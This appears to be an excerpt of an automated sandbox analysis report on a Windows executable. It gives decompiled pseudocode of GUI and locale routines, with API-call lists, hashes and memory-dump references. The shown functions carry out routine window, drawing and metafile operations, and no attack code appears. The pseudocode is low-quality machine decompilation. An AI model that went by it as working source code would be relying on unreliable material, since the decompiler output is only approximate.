                                                                                0x004352fa
                                                                                0x004352fa
                                                                                0x00435304
                                                                                0x0043531d
                                                                                0x00435306
                                                                                0x00435314
                                                                                0x00435314
                                                                                0x00435324
                                                                                0x0043535e
                                                                                0x00435361
                                                                                0x0043532c
                                                                                0x0043532f
                                                                                0x00435353
                                                                                0x00435358
                                                                                0x00435331
                                                                                0x00435342
                                                                                0x00435344
                                                                                0x00435344
                                                                                0x0043532f
                                                                                0x00435368
                                                                                0x0043536d
                                                                                0x004353b1
                                                                                0x00435375
                                                                                0x0043537d
                                                                                0x004353a8
                                                                                0x0043537f
                                                                                0x00435394
                                                                                0x00435394
                                                                                0x0043537d
                                                                                0x004353c9
                                                                                0x004353d7
                                                                                0x004353df
                                                                                0x004353f2
                                                                                0x004353f2
                                                                                0x00435400
                                                                                0x00435408
                                                                                0x0043541b
                                                                                0x0043541b
                                                                                0x00435425
                                                                                0x00435445
                                                                                0x00435445
                                                                                0x00000000

                                                                                APIs
                                                                                • MulDiv.KERNEL32(?,?,?), ref: 004352F5
                                                                                • MulDiv.KERNEL32(?,?,?), ref: 0043530F
                                                                                • MulDiv.KERNEL32(?,?,?), ref: 0043533D
                                                                                • MulDiv.KERNEL32(?,?,?), ref: 00435353
                                                                                • MulDiv.KERNEL32(?,?,?), ref: 0043538B
                                                                                • MulDiv.KERNEL32(?,?,?), ref: 004353A3
                                                                                • MulDiv.KERNEL32(?,?,0000001F), ref: 004353ED
                                                                                • MulDiv.KERNEL32(?,?,0000001F), ref: 00435416
                                                                                • MulDiv.KERNEL32(00000000,?,0000001F), ref: 0043543C
                                                                                  • Part of subcall function 0041EDEC: MulDiv.KERNEL32(00000000,?,00000048), ref: 0041EDF9
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 435e03ab1caa1e1677467894ed5e915b6374115a8e24f0854a88f83eb046f16a
                                                                                • Instruction ID: 8953bc8b0a4d67b9433345c2c8a17991cd0cb88a4a3005cd9b45d3bc99294169
                                                                                • Opcode Fuzzy Hash: 435e03ab1caa1e1677467894ed5e915b6374115a8e24f0854a88f83eb046f16a
                                                                                • Instruction Fuzzy Hash: 405160B0208B40AFD720DF69C845B6BB7E9AF49344F08582EBDD6C7752C679E840CB19
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00436150, Relevance: 13.6, APIs: 9, Instructions: 122windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 39%
                                                                                			E00436150(void* __ebx, char __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
				char _v5;
				struct HWND__* _v12;
				struct HDC__* _v16;
				void* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				int _v32;
				int _v36;
				int _t76;
				intOrPtr _t82;
				int _t85;
				void* _t90;
				int _t91;
				void* _t94;
				void* _t95;
				intOrPtr _t96;

				_t94 = _t95;
				_t96 = _t95 + 0xffffffe0;
				_v5 = __ecx;
				_t76 =  *((intOrPtr*)( *__edx + 0x38))();
				if(_v5 == 0) {
					_push(__edx);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_pop(_t90);
				} else {
					_push(__edx);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_pop(_t90);
				}
				_v12 = GetDesktopWindow();
				_v16 = GetDCEx(_v12, 0, 0x402);
				_push(_t94);
				_push(0x43626b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t96;
				_v20 = SelectObject(_v16, E0041F36C( *((intOrPtr*)(_t90 + 0x40))));
				_t91 = _v36;
				_t85 = _v32;
				PatBlt(_v16, _t91 + _t76, _t85, _v28 - _t91 - _t76, _t76, 0x5a0049);
				PatBlt(_v16, _v28 - _t76, _t85 + _t76, _t76, _v24 - _t85 - _t76, 0x5a0049);
				PatBlt(_v16, _t91, _v24 - _t76, _v28 - _v36 - _t76, _t76, 0x5a0049);
				PatBlt(_v16, _t91, _t85, _t76, _v24 - _v32 - _t76, 0x5a0049);
				SelectObject(_v16, _v20);
				_pop(_t82);
				 *[fs:eax] = _t82;
				_push(0x436272);
				return ReleaseDC(_v12, _v16);
			}



















                                                                                0x00436151
                                                                                0x00436153
                                                                                0x00436159
                                                                                0x00436165
                                                                                0x0043616b
                                                                                0x0043617b
                                                                                0x00436182
                                                                                0x00436183
                                                                                0x00436184
                                                                                0x00436185
                                                                                0x00436186
                                                                                0x0043616d
                                                                                0x0043616d
                                                                                0x00436174
                                                                                0x00436175
                                                                                0x00436176
                                                                                0x00436177
                                                                                0x00436178
                                                                                0x00436178
                                                                                0x0043618c
                                                                                0x0043619f
                                                                                0x004361a4
                                                                                0x004361a5
                                                                                0x004361aa
                                                                                0x004361ad
                                                                                0x004361c2
                                                                                0x004361ce
                                                                                0x004361d6
                                                                                0x004361e3
                                                                                0x00436205
                                                                                0x00436224
                                                                                0x0043623e
                                                                                0x0043624b
                                                                                0x00436252
                                                                                0x00436255
                                                                                0x00436258
                                                                                0x0043626a

                                                                                APIs
                                                                                • GetDesktopWindow.USER32 ref: 00436187
                                                                                • GetDCEx.USER32(?,00000000,00000402), ref: 0043619A
                                                                                • SelectObject.GDI32(?,00000000), ref: 004361BD
                                                                                • PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 004361E3
                                                                                • PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 00436205
                                                                                • PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 00436224
                                                                                • PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 0043623E
                                                                                • SelectObject.GDI32(?,?), ref: 0043624B
                                                                                • ReleaseDC.USER32 ref: 00436265
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: ObjectSelect$DesktopReleaseWindow
                                                                                • String ID:
                                                                                • API String ID: 1187665388-0
                                                                                • Opcode ID: 6328050413eb74116ad7d92f3afa9dced3ae8c7170b365d07b3f59a090ef8c9d
                                                                                • Instruction ID: 84461609b0ce5577f178a86038dc7842a2152db3a2ecfe340c7df496a6863dc3
                                                                                • Opcode Fuzzy Hash: 6328050413eb74116ad7d92f3afa9dced3ae8c7170b365d07b3f59a090ef8c9d
                                                                                • Instruction Fuzzy Hash: 4F313DB6A00219BFDB00DEEDCC85EAFBBBCAF09354B414565F504F7241C679AD048BA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040AEE4, Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 72%
                                                                                			E0040AEE4(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				void* _t104;
				void* _t111;
				void* _t133;
				intOrPtr _t183;
				intOrPtr _t193;
				intOrPtr _t194;

				_t191 = __esi;
				_t190 = __edi;
				_t193 = _t194;
				_t133 = 8;
				do {
					_push(0);
					_push(0);
					_t133 = _t133 - 1;
				} while (_t133 != 0);
				_push(__ebx);
				_push(_t193);
				_push(0x40b1af);
				_push( *[fs:eax]);
				 *[fs:eax] = _t194;
				E0040AD70();
				E004099B8(__ebx, __edi, __esi);
				_t196 =  *0x4877fc;
				if( *0x4877fc != 0) {
					E00409B90(__esi, _t196);
				}
				_t132 = GetThreadLocale();
				E00409908(_t43, 0, 0x14,  &_v20);
				E00404374(0x487730, _v20);
				E00409908(_t43, 0x40b1c4, 0x1b,  &_v24);
				 *0x487734 = E00408708(0x40b1c4, 0, _t196);
				E00409908(_t132, 0x40b1c4, 0x1c,  &_v28);
				 *0x487735 = E00408708(0x40b1c4, 0, _t196);
				 *0x487736 = E00409954(_t132, 0x2c, 0xf);
				 *0x487737 = E00409954(_t132, 0x2e, 0xe);
				E00409908(_t132, 0x40b1c4, 0x19,  &_v32);
				 *0x487738 = E00408708(0x40b1c4, 0, _t196);
				 *0x487739 = E00409954(_t132, 0x2f, 0x1d);
				E00409908(_t132, "m/d/yy", 0x1f,  &_v40);
				E00409C40(_v40, _t132,  &_v36, _t190, _t191, _t196);
				E00404374(0x48773c, _v36);
				E00409908(_t132, "mmmm d, yyyy", 0x20,  &_v48);
				E00409C40(_v48, _t132,  &_v44, _t190, _t191, _t196);
				E00404374(0x487740, _v44);
				 *0x487744 = E00409954(_t132, 0x3a, 0x1e);
				E00409908(_t132, 0x40b1f8, 0x28,  &_v52);
				E00404374(0x487748, _v52);
				E00409908(_t132, 0x40b204, 0x29,  &_v56);
				E00404374(0x48774c, _v56);
				E00404320( &_v12);
				E00404320( &_v16);
				E00409908(_t132, 0x40b1c4, 0x25,  &_v60);
				_t104 = E00408708(0x40b1c4, 0, _t196);
				_t197 = _t104;
				if(_t104 != 0) {
					E004043B8( &_v8, 0x40b21c);
				} else {
					E004043B8( &_v8, 0x40b210);
				}
				E00409908(_t132, 0x40b1c4, 0x23,  &_v64);
				_t111 = E00408708(0x40b1c4, 0, _t197);
				_t198 = _t111;
				if(_t111 == 0) {
					E00409908(_t132, 0x40b1c4, 0x1005,  &_v68);
					if(E00408708(0x40b1c4, 0, _t198) != 0) {
						E004043B8( &_v12, 0x40b238);
					} else {
						E004043B8( &_v16, 0x40b228);
					}
				}
				_push(_v12);
				_push(_v8);
				_push(":mm");
				_push(_v16);
				E00404698();
				_push(_v12);
				_push(_v8);
				_push(":mm:ss");
				_push(_v16);
				E00404698();
				 *0x4877fe = E00409954(_t132, 0x2c, 0xc);
				_pop(_t183);
				 *[fs:eax] = _t183;
				_push(E0040B1B6);
				return E00404344( &_v68, 0x10);
			}

























                                                                                0x0040aee4
                                                                                0x0040aee4
                                                                                0x0040aee5
                                                                                0x0040aee7
                                                                                0x0040aeec
                                                                                0x0040aeec
                                                                                0x0040aeee
                                                                                0x0040aef0
                                                                                0x0040aef0
                                                                                0x0040aef3
                                                                                0x0040aef6
                                                                                0x0040aef7
                                                                                0x0040aefc
                                                                                0x0040aeff
                                                                                0x0040af02
                                                                                0x0040af07
                                                                                0x0040af0c
                                                                                0x0040af13
                                                                                0x0040af15
                                                                                0x0040af15
                                                                                0x0040af1f
                                                                                0x0040af2e
                                                                                0x0040af3b
                                                                                0x0040af50
                                                                                0x0040af5f
                                                                                0x0040af74
                                                                                0x0040af83
                                                                                0x0040af96
                                                                                0x0040afa9
                                                                                0x0040afbe
                                                                                0x0040afcd
                                                                                0x0040afe0
                                                                                0x0040aff5
                                                                                0x0040b000
                                                                                0x0040b00d
                                                                                0x0040b022
                                                                                0x0040b02d
                                                                                0x0040b03a
                                                                                0x0040b04d
                                                                                0x0040b062
                                                                                0x0040b06f
                                                                                0x0040b084
                                                                                0x0040b091
                                                                                0x0040b099
                                                                                0x0040b0a1
                                                                                0x0040b0b6
                                                                                0x0040b0c0
                                                                                0x0040b0c5
                                                                                0x0040b0c7
                                                                                0x0040b0e0
                                                                                0x0040b0c9
                                                                                0x0040b0d1
                                                                                0x0040b0d1
                                                                                0x0040b0f5
                                                                                0x0040b0ff
                                                                                0x0040b104
                                                                                0x0040b106
                                                                                0x0040b118
                                                                                0x0040b129
                                                                                0x0040b142
                                                                                0x0040b12b
                                                                                0x0040b133
                                                                                0x0040b133
                                                                                0x0040b129
                                                                                0x0040b147
                                                                                0x0040b14a
                                                                                0x0040b14d
                                                                                0x0040b152
                                                                                0x0040b15f
                                                                                0x0040b164
                                                                                0x0040b167
                                                                                0x0040b16a
                                                                                0x0040b16f
                                                                                0x0040b17c
                                                                                0x0040b18f
                                                                                0x0040b196
                                                                                0x0040b199
                                                                                0x0040b19c
                                                                                0x0040b1ae

                                                                                APIs
                                                                                • GetThreadLocale.KERNEL32(00000000,0040B1AF,?,?,00000000,00000000), ref: 0040AF1A
                                                                                  • Part of subcall function 00409908: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409926
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Locale$InfoThread
                                                                                • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                • API String ID: 4232894706-2493093252
                                                                                • Opcode ID: 26a1346b2054bbf97c80b006f0a7e2c26dcba65b8b9294efc9de51d471659dcb
                                                                                • Instruction ID: dd7168d140dabf44b549f8ddecd6ea9c3e8e9b3ee97471e2bc34665e137c0820
                                                                                • Opcode Fuzzy Hash: 26a1346b2054bbf97c80b006f0a7e2c26dcba65b8b9294efc9de51d471659dcb
                                                                                • Instruction Fuzzy Hash: AA613B707042489BDB00FBA6CCA1A9E76A6DB89304F60943EE550BB3C6CB3CDD05875D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0043302C, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 139threadCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 96%
                                                                                			E0043302C(intOrPtr __eax, void* __ecx, char _a4) {
				char _v5;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				struct HWND__* _v24;
				intOrPtr _v28;
				void* _v32;
				struct tagRECT _v48;
				struct tagRECT _v64;
				struct HWND__* _t53;
				intOrPtr _t55;
				intOrPtr _t60;
				intOrPtr _t65;
				intOrPtr _t79;
				intOrPtr _t85;
				intOrPtr _t87;
				intOrPtr _t94;
				intOrPtr _t99;
				intOrPtr _t102;
				void* _t103;
				intOrPtr* _t105;
				intOrPtr _t107;
				intOrPtr _t111;
				intOrPtr _t113;
				struct HWND__* _t114;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t118;

				_t103 = __ecx;
				_t102 = __eax;
				_v5 = 1;
				_t2 =  &_a4; // 0x43334d
				_t114 = E00433464( *_t2 + 0xfffffff7);
				_v24 = _t114;
				_t53 = GetWindow(_t114, 4);
				_t105 =  *0x486c60; // 0x487bfc
				if(_t53 ==  *((intOrPtr*)( *_t105 + 0x30))) {
					L6:
					if(_v24 == 0) {
						L25:
						return _v5;
					}
					_t115 = _t102;
					while(1) {
						_t55 =  *((intOrPtr*)(_t115 + 0x30));
						if(_t55 == 0) {
							break;
						}
						_t115 = _t55;
					}
					_t113 = E0043BD14(_t115);
					_v28 = _t113;
					if(_t113 == _v24) {
						goto L25;
					}
					_t12 =  &_a4; // 0x43334d
					_t60 =  *((intOrPtr*)( *((intOrPtr*)( *_t12 - 0x10)) + 0x30));
					if(_t60 == 0) {
						_t18 =  &_a4; // 0x43334d
						_t107 =  *0x4317f8; // 0x431844
						__eflags = E00403740( *((intOrPtr*)( *_t18 - 0x10)), _t107);
						if(__eflags == 0) {
							__eflags = 0;
							_v32 = 0;
						} else {
							_t20 =  &_a4; // 0x43334d
							_v32 = E0043BD14( *((intOrPtr*)( *_t20 - 0x10)));
						}
						L19:
						_v12 = 0;
						_t65 = _a4;
						_v20 =  *((intOrPtr*)(_t65 - 9));
						_v16 =  *((intOrPtr*)(_t65 - 5));
						EnumThreadWindows(GetCurrentThreadId(), E00432FC0,  &_v32);
						_t127 = _v12;
						if(_v12 == 0) {
							goto L25;
						}
						GetWindowRect(_v24,  &_v48);
						_push(_a4 + 0xfffffff7);
						_push(_a4 - 1);
						E004037B0(_t102, _t127);
						_t79 =  *0x487b84; // 0x0
						_t111 =  *0x4305d4; // 0x430620
						if(E00403740(_t79, _t111) == 0) {
							L23:
							if(IntersectRect( &_v48,  &_v48,  &_v64) != 0) {
								_v5 = 0;
							}
							goto L25;
						}
						_t85 =  *0x487b84; // 0x0
						if( *((intOrPtr*)( *((intOrPtr*)(_t85 + 0x38)) + 0xa0)) == 0) {
							goto L23;
						}
						_t87 =  *0x487b84; // 0x0
						if(E0043BD14( *((intOrPtr*)( *((intOrPtr*)(_t87 + 0x38)) + 0xa0))) == _v24) {
							goto L25;
						}
						goto L23;
					}
					_t117 = _t60;
					while(1) {
						_t94 =  *((intOrPtr*)(_t117 + 0x30));
						if(_t94 == 0) {
							break;
						}
						_t117 = _t94;
					}
					_v32 = E0043BD14(_t117);
					goto L19;
				}
				_t118 = E004325B4(_v24, _t103);
				if(_t118 == 0) {
					goto L25;
				} else {
					while(1) {
						_t99 =  *((intOrPtr*)(_t118 + 0x30));
						if(_t99 == 0) {
							break;
						}
						_t118 = _t99;
					}
					_v24 = E0043BD14(_t118);
					goto L6;
				}
			}































                                                                                0x0043302c
                                                                                0x00433035
                                                                                0x00433037
                                                                                0x0043303b
                                                                                0x00433046
                                                                                0x00433048
                                                                                0x0043304e
                                                                                0x00433053
                                                                                0x0043305e
                                                                                0x00433087
                                                                                0x0043308b
                                                                                0x004331ba
                                                                                0x004331c3
                                                                                0x004331c3
                                                                                0x00433091
                                                                                0x00433097
                                                                                0x00433097
                                                                                0x0043309c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00433095
                                                                                0x00433095
                                                                                0x004330a5
                                                                                0x004330a7
                                                                                0x004330ad
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004330b3
                                                                                0x004330b9
                                                                                0x004330be
                                                                                0x004330dc
                                                                                0x004330e2
                                                                                0x004330ed
                                                                                0x004330ef
                                                                                0x00433101
                                                                                0x00433103
                                                                                0x004330f1
                                                                                0x004330f1
                                                                                0x004330fc
                                                                                0x004330fc
                                                                                0x00433106
                                                                                0x00433106
                                                                                0x0043310a
                                                                                0x00433110
                                                                                0x00433116
                                                                                0x00433128
                                                                                0x0043312d
                                                                                0x00433131
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0043313f
                                                                                0x0043314a
                                                                                0x0043314f
                                                                                0x0043315f
                                                                                0x00433164
                                                                                0x00433169
                                                                                0x00433176
                                                                                0x004331a1
                                                                                0x004331b4
                                                                                0x004331b6
                                                                                0x004331b6
                                                                                0x00000000
                                                                                0x004331b4
                                                                                0x00433178
                                                                                0x00433187
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00433189
                                                                                0x0043319f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0043319f
                                                                                0x004330c3
                                                                                0x004330c9
                                                                                0x004330c9
                                                                                0x004330ce
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004330c7
                                                                                0x004330c7
                                                                                0x004330d7
                                                                                0x00000000
                                                                                0x004330d7
                                                                                0x00433068
                                                                                0x0043306c
                                                                                0x00000000
                                                                                0x00433072
                                                                                0x00433076
                                                                                0x00433076
                                                                                0x0043307b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00433074
                                                                                0x00433074
                                                                                0x00433084
                                                                                0x00000000
                                                                                0x00433084

                                                                                APIs
                                                                                  • Part of subcall function 00433464: WindowFromPoint.USER32(M3C,?,00000000,00433046,?,-0000000C,?), ref: 0043346A
                                                                                  • Part of subcall function 00433464: GetParent.USER32(00000000), ref: 00433481
                                                                                • GetWindow.USER32(00000000,00000004), ref: 0043304E
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00433122
                                                                                • EnumThreadWindows.USER32(00000000,00432FC0,?), ref: 00433128
                                                                                • GetWindowRect.USER32 ref: 0043313F
                                                                                • IntersectRect.USER32 ref: 004331AD
                                                                                  • Part of subcall function 004325B4: GlobalFindAtomA.KERNEL32 ref: 004325C8
                                                                                  • Part of subcall function 004325B4: GetPropA.USER32 ref: 004325DF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Window$RectThread$AtomCurrentEnumFindFromGlobalIntersectParentPointPropWindows
                                                                                • String ID: M3C$M3C
                                                                                • API String ID: 3421286612-1772212157
                                                                                • Opcode ID: 167005de3e12df1bc501e74554e0fdcc86c459c142df6451632031e8b72de865
                                                                                • Instruction ID: a128a9aac8d38b63d4cbe000c1c78fed1b90614d1cbd1cfb40740373f1eb891c
                                                                                • Opcode Fuzzy Hash: 167005de3e12df1bc501e74554e0fdcc86c459c142df6451632031e8b72de865
                                                                                • Instruction Fuzzy Hash: A4516071A002059FCB50DF69C884BAEBBF4AF08355F1491A6F914EB351D738EE41CBA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00455740, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 132windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetActiveWindow.USER32 ref: 00455753
                                                                                • GetWindowRect.USER32 ref: 004557AD
                                                                                • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,?), ref: 004557E5
                                                                                • MessageBoxA.USER32 ref: 00455826
                                                                                • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,0045589C,?,00000000,00455895), ref: 00455876
                                                                                • SetActiveWindow.USER32(?,0045589C,?,00000000,00455895), ref: 00455887
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Window$Active$MessageRect
                                                                                • String ID: (
                                                                                • API String ID: 3147912190-3887548279
                                                                                • Opcode ID: 991e29146cb3f81c84a2e9932392e15928f57e88c8a078de1bc06f8c3ea20abf
                                                                                • Instruction ID: 27f95780b0de453b95edefb76a011dd12389370940b1ed7da23c547e447e93a7
                                                                                • Opcode Fuzzy Hash: 991e29146cb3f81c84a2e9932392e15928f57e88c8a078de1bc06f8c3ea20abf
                                                                                • Instruction Fuzzy Hash: FE413C75E00208AFDB44DBA9CD95FBE77F9EB48304F14446AF900EB392D678AE048B54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0042237E, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 123fileCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 94%
                                                                                			E0042237E(void* __eax, void* __ebx, int __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				int _v12;
				BYTE* _v16;
				intOrPtr _v18;
				signed int _v24;
				short _v26;
				short _v28;
				short _v30;
				short _v32;
				char _v38;
				struct tagMETAFILEPICT _v54;
				intOrPtr _v118;
				intOrPtr _v122;
				struct tagENHMETAHEADER _v154;
				intOrPtr _t103;
				intOrPtr _t115;
				struct HENHMETAFILE__* _t119;
				struct HENHMETAFILE__* _t120;
				void* _t122;
				void* _t123;
				void* _t124;
				void* _t125;
				intOrPtr _t126;

				_t124 = _t125;
				_t126 = _t125 + 0xffffff68;
				_v12 = __ecx;
				_v8 = __edx;
				_t122 = __eax;
				E0042221C(__eax);
				 *((intOrPtr*)( *_v8 + 8))(__edi, __esi, __ebx, _t123);
				if(_v38 != 0x9ac6cdd7 || E00420F04( &_v38) != _v18) {
					E004200B4();
				}
				_v12 = _v12 - 0x16;
				_v16 = E0040272C(_v12);
				_t103 =  *((intOrPtr*)(_t122 + 0x28));
				 *[fs:eax] = _t126;
				 *((intOrPtr*)( *_v8 + 8))( *[fs:eax], 0x4224ef, _t124);
				 *((short*)( *((intOrPtr*)(_t122 + 0x28)) + 0x18)) = _v24;
				if(_v24 == 0) {
					_v24 = 0x60;
				}
				 *((intOrPtr*)(_t103 + 0xc)) = MulDiv(_v28 - _v32, 0x9ec, _v24 & 0x0000ffff);
				 *((intOrPtr*)(_t103 + 0x10)) = MulDiv(_v26 - _v30, 0x9ec, _v24 & 0x0000ffff);
				_v54.mm = 8;
				_v54.xExt = 0;
				_v54.yExt = 0;
				_v54.hMF = 0;
				_t119 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
				 *(_t103 + 8) = _t119;
				if(_t119 == 0) {
					E004200B4();
				}
				GetEnhMetaFileHeader( *(_t103 + 8), 0x64,  &_v154);
				_v54.mm = 8;
				_v54.xExt = _v122;
				_v54.yExt = _v118;
				_v54.hMF = 0;
				DeleteEnhMetaFile( *(_t103 + 8));
				_t120 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
				 *(_t103 + 8) = _t120;
				if(_t120 == 0) {
					E004200B4();
				}
				 *((char*)(_t122 + 0x2c)) = 0;
				_pop(_t115);
				 *[fs:eax] = _t115;
				_push(E004224F6);
				return E0040274C(_v16);
			}


























                                                                                0x00422381
                                                                                0x00422383
                                                                                0x0042238c
                                                                                0x0042238f
                                                                                0x00422392
                                                                                0x00422396
                                                                                0x004223a8
                                                                                0x004223b2
                                                                                0x004223c2
                                                                                0x004223c2
                                                                                0x004223c7
                                                                                0x004223d3
                                                                                0x004223d6
                                                                                0x004223e4
                                                                                0x004223f2
                                                                                0x004223fc
                                                                                0x00422405
                                                                                0x00422407
                                                                                0x00422407
                                                                                0x00422427
                                                                                0x00422444
                                                                                0x00422447
                                                                                0x00422450
                                                                                0x00422455
                                                                                0x0042245a
                                                                                0x00422470
                                                                                0x00422472
                                                                                0x00422477
                                                                                0x00422479
                                                                                0x00422479
                                                                                0x0042248b
                                                                                0x00422490
                                                                                0x0042249a
                                                                                0x004224a0
                                                                                0x004224a5
                                                                                0x004224ac
                                                                                0x004224c4
                                                                                0x004224c6
                                                                                0x004224cb
                                                                                0x004224cd
                                                                                0x004224cd
                                                                                0x004224d2
                                                                                0x004224d8
                                                                                0x004224db
                                                                                0x004224de
                                                                                0x004224ee

                                                                                APIs
                                                                                • MulDiv.KERNEL32(?,000009EC,00000000), ref: 00422422
                                                                                • MulDiv.KERNEL32(?,000009EC,00000000), ref: 0042243F
                                                                                • SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 0042246B
                                                                                • GetEnhMetaFileHeader.GDI32(00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 0042248B
                                                                                • DeleteEnhMetaFile.GDI32(00000016), ref: 004224AC
                                                                                • SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC), ref: 004224BF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
